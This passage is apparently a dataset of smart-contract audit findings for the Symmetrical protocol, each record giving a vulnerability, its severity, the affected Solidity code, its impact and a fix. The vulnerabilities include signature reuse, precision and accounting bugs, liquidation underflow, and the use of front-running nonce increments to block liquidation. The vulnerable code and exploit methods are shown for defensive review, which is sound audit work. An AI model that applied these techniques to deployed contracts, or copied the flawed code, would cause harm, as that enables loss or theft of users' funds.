1 passed; 0 failed; finished in 11.27ms\\n```\\n\\nFrom the above test example, we can see that the `verifyPrices` and `verifyPartyAUpnlAndPrice` signatures can be used interchangeably If we get a legal `verifyPartyAUpnlAndPrice` , it can be used as the signature of `verifyPrices ()` Use `partyANonces` as `upnl`, etcчIt is recommended to add the prefix of the hash, or use `api.encode` Such as:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n+ \"verifyPrices\",\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\nчSignatures can be reused due to hash collisions, through illegal signatures, using illegal `unpl`, etcч```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n -`depositAndAllocateForPartyB` is broken due to incorrect precisionчhighчDue to incorrect precision, any users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account. 
This might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the function outcome to perform certain actions that deal with funds/assets.\\nThe input `amount` of the `depositForPartyB` function must be in native precision (e.g. USDC should be 6 decimals) as the function will automatically scale the `amount` to 18 precision in Lines 114-115 below.\\n```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n\\nOn the other hand, the input `amount` of `allocateForPartyB` function must be in 18 decimals precision. Within the protocol, it uses 18 decimals for internal accounting.\\n```\\nFile: AccountFacetImpl.sol\\n function allocateForPartyB(uint256 amount, address partyA, bool increaseNonce) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n require(accountLayout.balances[msg.sender] >= amount, \"PartyBFacet: Insufficient balance\");\\n require(\\n !MAStorage.layout().partyBLiquidationStatus[msg.sender][partyA],\\n \"PartyBFacet: PartyB isn't solvent\"\\n );\\n if (increaseNonce) {\\n accountLayout.partyBNonces[msg.sender][partyA] += 1;\\n }\\n accountLayout.balances[msg.sender] -= amount;\\n accountLayout.partyBAllocatedBalances[msg.sender][partyA] += amount;\\n }\\n```\\n\\nThe `depositAndAllocateForPartyB` function allows the users to deposit and allocate to their accounts within a single transaction. Within the function, it calls the `depositForPartyB` function followed by the `allocateForPartyB` function. The function passes the same `amount` into both the `depositForPartyB` and `allocateForPartyB` functions. 
However, the problem is that one accepts `amount` in native precision (e.g. 6 decimals) while the other accepts `amount` in scaled decimals (e.g. 18 decimals).\\nAssume that Alice calls the `depositAndAllocateForPartyB` function and intends to deposit and allocate 1000 USDC. Thus, she set the `amount` of the `depositAndAllocateForPartyB` function to `1000e6` as the precision of USDC is `6`.\\nThe `depositForPartyB` function at Line 78 will work as intended because it will automatically be scaled up to internal accounting precision (18 decimals) within the function, and 1000 USDC will be deposited to her account.\\nThe `allocateForPartyB` at Line 79 will not work as intended. The function expects the `amount` to be in internal accounting precision (18 decimals), but an `amount` in native precision (6 decimals for USDC) is passed in. As a result, only 0.000000001 USDC will be allocated to her account.\\n```\\nFile: AccountFacet.sol\\n function depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n ) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n emit DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n }\\n```\\nчScale the `amount` to internal accounting precision (18 decimals) before passing it to the `allocateForPartyB` function.\\n```\\nfunction depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n// Add the line below\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n// Add the line below\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n// Remove the line below\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n// Add the line below\\n AccountFacetImpl.allocateForPartyB(amountWith18Decimals, partyA, true);\\n emit 
DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n}\\n```\\nчAny users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account, which might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the outcome to perform certain actions dealing with funds/assets.\\nFor instance, Bob's account is close to being liquidated. Thus, he might call the `depositAndAllocateForPartyB` function in an attempt to increase its allocated balance and improve its account health level to avoid being liquidated. However, the `depositAndAllocateForPartyB` is not working as expected, and its allocated balance only increased by a very small amount (e.g. 0.000000001 USDC in our example). Bob believed that his account was healthy, but in reality, his account was still in danger as it only increased by 0.000000001 USDC. 
In the next one or two blocks, the price swung, and Bob's account was liquidated.ч```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n -Accounting error in PartyB's pending locked balance led to loss of fundsчhighчAccounting error in the PartyB's pending locked balance during the partial filling of a position could lead to a loss of assets for PartyB.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n\\nParameter Description\\n$quote_{current}$ Current quote (Quote ID = 1)\\n$quote_{new}$ Newly created quote (Quote ID = 2) due to partially filling\\n$lockedValue_{total}$ 100 USD. The locked values of $quote_{current}$\\n$lockedValue_{filled}$ 30 USD. $lockedValue_{filled} = lockedValue_{total}\\times\\frac{filledAmount}{quote.quantity}$\\n$lockedValue_{unfilled}$ 70 USD. $lockedValue_{unfilled} = lockedValue_{total}-lockedValue_{filled}$\\n$pendingLockedBalance_{a}$ 100 USD. PartyA's pending locked balance\\n$pendingLockedBalance_{b}$ 100 USD. PartyB's pending locked balance\\n$pendingQuotes_a$ PartyA's pending quotes. $pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b$ PartyB's pending quotes. 
$pendingQuotes_b = [quote_{current}]$\\nAssume the following states before the execution of the `openPosition` function:\\n$pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b = [quote_{current}]$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nWhen the `openPosition` function is executed, $quote_{current}$ will be removed from $pendingQuotes_a$ and $pendingQuotes_b$ in Line 156.\\nIf the position is partially filled, $quote_{current}$ will be filled, and $quote_{new}$ will be created with the unfilled amount ($lockedValue_{unfilled}$). The $quote_{new}$ is automatically added to PartyA's pending quote list in Line 225.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nLine 238 removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{a}$ . The unfilled balance ($lockedValue_{unfilled}$) does not need to be removed from $pendingLockedBalance_{a}$ because it is now the balance of $quote_{new}$ that belong to PartyA. The value in $pendingLockedBalance_a$ is correct.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nIn Line 239, the code removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{b}$\\nThe end state is as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 70\\ USD$\\nAs shown above, the value of $pendingLockedBalance_{b}$ is incorrect. 
Even though PartyB has no pending quote, 70 USD is still locked in the pending balance.\\nThere are three (3) important points to note:\\n$quote_{current}$ has already been removed from $pendingQuotes_b$ in Line 156\\n$quote_{new}$ is not automatically added to $pendingQuotes_b$. When $quote_{new}$ is created, it is not automatically locked to PartyB.\\n$pendingQuotes_b$ is empty\\nAs such, $lockedValue_{total}$ should be removed from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.чUpdate the affected function to remove $lockedValue_{total}$ from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.\\n```\\naccountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\naccountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n// Remove the line below\\n filledLockedValues\\n// Add the line below\\n quote.lockedValues\\n);\\n```\\nчEvery time PartyB partially fill a position, their $pendingLockedBalance_b$ will silently increase and become inflated. The pending locked balance plays a key role in the protocol's accounting system. Thus, an error in the accounting breaks many of the computations and invariants of the protocol.\\nFor instance, it is used to compute the available balance of an account in `partyBAvailableForQuote` function. Assuming that the allocated balance remains the same. If the pending locked balance increases silently due to the bug, the available balance returned from the `partyBAvailableForQuote` function will decrease. Eventually, it will \"consume\" all the allocated balance, and there will be no available funds left for PartyB to open new positions or to deallocate+withdraw funds. 
Thus, leading to lost of assets for PartyB.ч```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n -Liquidation can be blocked by incrementing the nonceчhighчMalicious users could block liquidators from liquidating their accounts, which creates unfairness in the system and lead to a loss of profits to the counterparty.\\nInstance 1 - Blocking liquidation of PartyA\\nA liquidatable PartyA can block liquidators from liquidating its account.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, \"LiquidationFacet: PartyA is solvent\");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n\\nWithin the `liquidatePartyA` function, it calls the `LibMuon.verifyPartyAUpnl` function.\\n```\\nFile: LibMuon.sol\\n function verifyPartyAUpnl(SingleUpnlSig memory upnlSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// \"LibMuon: Expired signature\"\\n// );\\n bytes32 hash = keccak256(\\n 
abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nThe `verifyPartyAUpnl` function will take the current nonce of PartyA (AccountStorage.layout().partyANonces[partyA]) to build the hash needed for verification.\\nWhen the PartyA becomes liquidatable or near to becoming liquidatable, it could start to monitor the mempool for any transaction that attempts to liquidate their accounts. Whenever a liquidator submits a `liquidatePartyA` transaction to liquidate their accounts, they could front-run it and submit a transaction to increment their nonce. When the liquidator's transaction is executed, the on-chain PartyA's nonce will differ from the nonce in the signature, and the liquidation transaction will revert.\\nFor those chains that do not have a public mempool, they can possibly choose to submit a transaction that increments their nonce in every block as long as it is economically feasible to obtain the same result.\\nGas fees that PartyA spent might be cheap compared to the number of assets they will lose if their account is liquidated. 
Additionally, gas fees are cheap on L2 or side-chain (The protocol intended to support Arbitrum One, Arbitrum Nova, Fantom, Optimism, BNB chain, Polygon, Avalanche as per the contest details).\\nThere are a number of methods for PartyA to increment their nonce, this includes but not limited to the following:\\nAllocate or deallocate dust amount\\nLock and unlock the dummy position\\nCalls `requestToClosePosition` followed by `requestToCancelCloseRequest` immediately\\nInstance 2 - Blocking liquidation of PartyB\\nThe same exploit can be used to block the liquidation of PartyB since the `liquidatePartyB` function also relies on the `LibMuon.verifyPartyBUpnl,` which uses the on-chain nonce of PartyB for signature verification.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n LibMuon.verifyPartyBUpnl(upnlSig, partyB, partyA);\\n```\\nчIn most protocols, whether an account is liquidatable is determined on-chain, and this issue will not surface. However, the architecture of Symmetrical protocol relies on off-chain and on-chain components to determine if an account is liquidatable, which can introduce a number of race conditions such as the one mentioned in this report.\\nConsider reviewing the impact of malicious users attempting to increment the nonce in order to block certain actions in the protocols since most functions rely on the fact that the on-chain nonce must be in sync with the signature's nonce and update the architecture/contracts of the protocol accordingly.чPartyA can block their accounts from being liquidated by liquidators. 
Without the ability to liquidate the insolvent PartyA, the unrealized profits of all PartyBs cannot be realized, and thus they will not be able to withdraw the profits.\\nPartyA could also exploit this issue to block their account from being liquidated to:\\nWait for their positions to recover to reduce their losses\\nBuy time to obtain funds from elsewhere to inject into their accounts to bring the account back to a healthy level\\nSince this is a zero-sum game, the above-mentioned actions create unfairness to PartyB and reduce their profits.\\nThe impact is the same for the blocking of PartyB liquidation.ч```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, \"LiquidationFacet: PartyA is solvent\");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n -Liquidation of PartyA will fail due to underflow errorsчhighчLiquidation of PartyA will fail due to underflow errors.
As a result, assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n\\nAssume that at this point, the allocated balance of PartyB 
(accountLayout.partyBAllocatedBalances[quote.partyB][partyA]) only has 1000 USD.\\nIn Line 152 above, the `getValueOfQuoteForPartyA` function is called to compute the PnL of a position. Assume the position has a huge profit of 3000 USD due to a sudden spike in price. For this particular position, PartyA will profit 3000 USD while PartyB will lose 3000 USD.\\nIn this case, 3000 USD needs to be deducted from PartyB's account. However, when the `accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;` code at Line 170, 182, or 190 gets executed, an underflow error will occur, and the transaction will revert. This is because `partyBAllocatedBalances` is an unsigned integer, and PartyB only has 1000 USD of allocated balance, but the code attempts to deduct 3000 USD.чConsider implementing the following fixes to ensure that the amount to be deducted will never exceed the allocated balance of PartyB to prevent underflow errors from occurring.\\n```\\nif (hasMadeProfit) {\\n// Add the line below\\n amountToDeduct = amount > accountLayout.partyBAllocatedBalances[quote.partyB][partyA] ? accountLayout.partyBAllocatedBalances[quote.partyB][partyA] : amount\\n// Add the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amountToDeduct\\n// Remove the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amount;\\n} else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Add the line below\\n= amount;\\n}\\n```\\nчLiquidation of PartyA will fail. Since liquidation cannot be completed, the assets that are liable to be liquidated cannot be transferred from PartyA (the debtor) to the counterparty (the creditor). 
Assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.ч```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n -Liquidating pending quotes doesn't return trading fee to party AчmediumчWhen a user is liquidated, the trading fees of the 
pending quotes aren't returned.\\nWhen a pending/locked quote is canceled, the trading fee is sent back to party A, e.g.\\nBut, when a pending quote is liquidated, the trading fee is not used for the liquidation. Instead, the fee collector keeps the funds:\\n```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n \"LiquidationFacet: PartyA is solvent\"\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n\\n```\\n function liquidatePartyB(\\n address partyB,\\n address partyA,\\n SingleUpnlSig memory upnlSig\\n ) internal {\\n // // rest of code\\n uint256[] storage pendingQuotes = quoteLayout.partyAPendingQuotes[partyA];\\n\\n for (uint256 index = 0; index < pendingQuotes.length; ) {\\n Quote storage quote = quoteLayout.quotes[pendingQuotes[index]];\\n if (\\n quote.partyB == partyB &&\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING)\\n ) {\\n accountLayout.pendingLockedBalances[partyA].subQuote(quote);\\n\\n pendingQuotes[index] = pendingQuotes[pendingQuotes.length - 1];\\n pendingQuotes.pop();\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n 
quote.modifyTimestamp = block.timestamp;\\n } else {\\n index++;\\n }\\n }\\n```\\n\\nThese funds should be used to cover the liquidation. Since no trade has been executed, the fee collector shouldn't earn anything.чreturn the funds to party A. If party A is being liquidated, use the funds to cover the liquidation. Otherwise, party A keeps the funds.чLiquidation doesn't use paid trading fees to cover outstanding balances. Instead, the funds are kept by the fee collector.ч```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n \"LiquidationFacet: PartyA is solvent\"\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n -In case if trading fee will be changed then refund will be done with wrong amountчmediumчIn case if trading fee will be changed then refund will be done with wrong amount\\nWhen user creates quote, then he pays trading fees. 
Amount that should be paid is calculated inside `LibQuote.getTradingFee` function.\\n```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n\\nAs you can see `symbol.tradingFee` is used to determine fee amount. This fee can be changed any time.\\nWhen order is canceled, then fee should be returned to user. This function also uses `LibQuote.getTradingFee` function to calculate fee to return.\\nSo in case if order was created before fee changes, then returned amount will be not same, when it is canceled after fee changes.чYou can store fee paid by user inside quote struct. 
And when canceled, return that amount.чUser or protocol loses a portion of funds.ч```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n -lockQuote() increaseNonce parameters do not work properlyчmediumчIn `lockQuote()`, `partyBNonces[quote.partyB][quote.partyA] += 1` will be executed if increaseNonce == true. But this operation is executed before setting `quote.partyB`, resulting in actually setting `partyBNonces[address(0)][quote.partyA] += 1`\\nIn `lockQuote()`, when executing `partyBNonces[quote.partyB][quote.partyA] += 1`, `quote.partyB` is address(0)\\n```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n\\nactually setting `partyBNonces[address(0)][quote.partyA] += 1`ч```\\n function lockQuote(uint256
quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n- accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n+ accountLayout.partyBNonces[msg.sender][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\nчincreaseNonce parameters do not work properlyч```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n 